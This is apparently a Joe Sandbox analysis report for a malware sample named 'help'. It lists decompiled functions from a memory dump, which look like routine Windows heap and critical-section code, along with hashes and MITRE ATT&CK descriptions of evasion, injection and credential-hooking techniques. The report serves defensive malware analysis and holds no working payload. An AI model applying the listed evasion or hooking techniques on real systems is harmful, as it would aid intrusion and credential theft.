Opcode ID: f7c51ed418656f8bbec82c567fb6343030be7e0f8d221c8e4ed2b18644b4ceab
Instruction ID: c479af8b5686b7b72f15f62d6ddb6c7ee43e35c1c08bc71ce39eec8292d2bed5
Opcode Fuzzy Hash: f7c51ed418656f8bbec82c567fb6343030be7e0f8d221c8e4ed2b18644b4ceab
Instruction Fuzzy Hash: 6BE026B0205304DFEB34DB96D040F2D77BC9F42729F1D809EE00A4F101C621D880C256

Uniqueness

Uniqueness Score: -1.00%

Function 0387D380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0387D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L037CE8B0(__ecx, _a4, 0xfff);
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0387d38a
0x0387d39b
0x0387d3b1
0x00000000
0x0387d3b6
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 3c8cfc546a640c4851e605662b47461608687cec0978221df575180ef5d86c39
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 28E0C235280348BBDB229E84CC00F697B5AEF907A5F104079FE089EA90C675DCA1E6C4

Uniqueness

Uniqueness Score: -1.00%

Function 038541E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E038541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x38a08f0);
				_t5 = E0381D08C(__ebx, __edi, __esi);
				if( *0x38b87ec == 0) {
					E037DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x38b87ec == 0) {
						 *0x38b87f0 = 0x38b87ec;
						 *0x38b87ec = 0x38b87ec;
						 *0x38b87e8 = 0x38b87e4;
						 *0x38b87e4 = 0x38b87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L03854248();
				}
				return E0381D0D1(_t5);
			}

0x038541e8
0x038541ea
0x038541ef
0x038541fb
0x03854206
0x0385420b
0x03854216
0x0385421d
0x03854222
0x0385422c
0x03854231
0x03854231
0x03854236
0x0385423d
0x0385423d
0x03854247

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b41fb8303bd4f7b987f7f088adf8f813a7ae4bb07ffc13d4aed4afc49cfad25
Instruction ID: d12751d3dec6ba7e84dca820cdfbb23bf94852c28124b765618cbe85f744a831
Opcode Fuzzy Hash: 9b41fb8303bd4f7b987f7f088adf8f813a7ae4bb07ffc13d4aed4afc49cfad25
Instruction Fuzzy Hash: 3FF01578810BA6CFDBA0EFE9950872837BCF74431AF1081DA9120CB688E7744489CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 037FA185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037FA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x38b67e4 >= 0xa) {
					if(_t5 < 0x38b6800 || _t5 >= 0x38b6900) {
						return L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E037E0010(0x38b67e0, _t5);
				}
			}

0x037fa190
0x037fa1a6
0x037fa1c2
0x00000000
0x00000000
0x00000000
0x037fa192
0x037fa192
0x037fa19f
0x037fa19f

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12fe66a3948a3994a5aa60ba2959d536356ede484116c43016953b2da7745f27
Instruction ID: 80c087276acdc374e3a248ae0e528a80249f88ae61ead07ac01397cae2ac5c5b
Opcode Fuzzy Hash: 12fe66a3948a3994a5aa60ba2959d536356ede484116c43016953b2da7745f27
Instruction Fuzzy Hash: 94D02B219201051FD61CF3889828B212236F788700F31048CE30B8E7A1FB5088D8950C

Uniqueness

Uniqueness Score: -1.00%

Function 037F16E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037F16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E037F1710(0x38b67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L037E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x037f16e8
0x037f16ef
0x037f16f3
0x037f16fe
0x00000000
0x037f1700
0x037f170d
0x037f170d
0x037f16f2
0x037f16f2
0x037f16f2
0x037f16f2

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d885436114a6eede032c684989ec04589cba0200c88544fba5e7f381cfa7867
Instruction ID: 2f9b85b8f335ff991f8e80c3411c99c1e49646d3d13ed1fc2e5b7bb998b7465c
Opcode Fuzzy Hash: 5d885436114a6eede032c684989ec04589cba0200c88544fba5e7f381cfa7867
Instruction Fuzzy Hash: 8DD0A931200200EADE2DDB119808B142266FB80B91F7C00ACF32B9DAC0EFA1DCA2E05C

Uniqueness

Uniqueness Score: -1.00%

Function 038453CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E038453CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E037DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x038453ca
0x038453ce
0x038453d9
0x038453de
0x038453e1
0x038453e1
0x038453e6
0x038453f3
0x00000000
0x038453f8
0x038453fb

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: c7ed9f6d64620c4fdfa376b5853afdad1b2bc4e8054ba0bdb41760333655ea8f
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: A4E08C369007849BCF16EB88C654F4EB7F5FB86B00F180098A0089FA20C624AD00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 037DAAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037DAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x037daab6
0x037daabb
0x0382a442
0x00000000
0x0382a448
0x0382a454
0x0382a454
0x037daac1
0x037daac1
0x037daac6
0x037daac6

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 995bde6d752ac27cd68ea3f4cdd06f841bdd1d11f05cf3ae37a499b09c8e1f35
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 93D0E939352990CFD65ACB5DC594B1577B8BB44B44FD905D0E501CB761E62CD984CA00

Uniqueness

Uniqueness Score: -1.00%

Function 037F35A1 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037F35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E037DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x037f35a1
0x037f35a1
0x037f35a5
0x037f35ab
0x037f35ab
0x037f35b5
0x00000000
0x037f35c1
0x037f35b7

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 6b8f773497df6e844b547003809494b03abfe9962211efb494f609e98298d568
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 59D0C73D5512849DFF53EB78C11877C7775BB40318F5C106595450BA51C3354959D601

Uniqueness

Uniqueness Score: -1.00%

Function 037CDB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037CDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L037E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x037cdb4d
0x037cdb54
0x037cdb5f
0x037cdb56
0x037cdb56
0x037cdb5c
0x037cdb5c

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: ea9fa2a034b4b42b42d511e09386e6f1992e3193b96da51dfe986ba0b7d589d1
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 51C08C30290B40AAEB329F20CD01B0076A0BB00B01F4800A46300DA0F0EB78DC01EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0384A537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0384A537(intOrPtr _a4, intOrPtr _a8) {

				return L037E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0384a553

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: aa226747bf3e77207f68d4b815ec78d67e57978c0169446ed5a36f7ae0c21485
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 45C08C37080248BBCB12AF81CC00F167F2AFB98B60F008010FA080F570C632E970EB85

Uniqueness

Uniqueness Score: -1.00%

Function 037E3A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037E3A1C(intOrPtr _a4) {
				void* _t5;

				return L037E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x037e3a35

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: c0e3d95848de7c98e8852d7daeda4f692802bfa7257c596baae3e20e9c2bf4c9
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: E5C08C32080248BBCB12AE42DC00F017B29E794B60F000020B6040A5608532EC60D58C

Uniqueness

Uniqueness Score: -1.00%

Function 037D76E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037D76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x037d76e4
0x00000000
0x037d76f8
0x037d76fd

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 2d274208eaef6b4c5fc7f5d9f2bdfcd92eb8a7266afbba6f97f0524a7f825a60
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 6FC08C741412C05AEB2EDB08CE24B20B664AB08608F4C019CAA010D4A1D368A812C208

Uniqueness

Uniqueness Score: -1.00%

Function 037F36CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037F36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x037f36d2
0x037f36e8
0x037f36d4
0x037f36e5
0x037f36e5

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 54c643b4374251a3ec9f2a592736d5fda93cc4972282e39954319a49e3f4dd85
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: AFC02B78150440BFEB159F30CD00F147254F700A21F6C03547320495F0D5299C00D108

Uniqueness

Uniqueness Score: -1.00%

Function 037CAD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037CAD30(intOrPtr _a4) {

				return L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x037cad49

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: dc7c2aea1ee9624ed2ea5108203488b6c39134bb283b3e86d48c4ac7b31f9d97
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: D5C08C32080288BBC716AA45DD00F017B29E794B60F000020B6040A6618932E860E588

Uniqueness

Uniqueness Score: -1.00%

Function 037E7D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037E7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x037e7d56
0x037e7d5b
0x037e7d60
0x037e7d5d
0x037e7d5d
0x037e7d5d

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 5b11d069811217bb9b33570c98f6ada1052882333b0f8fdc809bee6494f18bf4
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 46B09234301981CFCE1ADF18C080B1533E8BB48A40B8800D0E400CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 037F2ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037F2ACB() {
				void* _t5;

				return E037DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x037f2adc

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 7b4f12bff7095082f8188f10d58c41c452e7333e64bb63b2df8a78e763113a09
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 29B092328116408BCF02EB44C610A197331AB00650F0544A090412B9208228AC01CA40

Uniqueness

Uniqueness Score: -1.00%

Function 0385FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0385FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0380CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03855720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03855720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0385fdda
0x0385fde2
0x0385fde5
0x0385fdec
0x0385fdfa
0x0385fdff
0x0385fe0a
0x0385fe0f
0x0385fe17
0x0385fe1e
0x0385fe19
0x0385fe19
0x0385fe19
0x0385fe20
0x0385fe21
0x0385fe22
0x0385fe25
0x0385fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0385FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0385FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0385FE2B

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: ba1ae0b02342f0df0d28043cac42a7e8bdc86033231451e2dc577db8896b4d06
Instruction ID: 17c279f1054b2122049793526047d25980216d83d7ace9f6e2d591b164c1380b
Opcode Fuzzy Hash: ba1ae0b02342f0df0d28043cac42a7e8bdc86033231451e2dc577db8896b4d06
Instruction Fuzzy Hash: E2F0FC76140201BFDE205A85DC01F63BF6ADB45730F140354FA249A1D1DA62F86086F1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

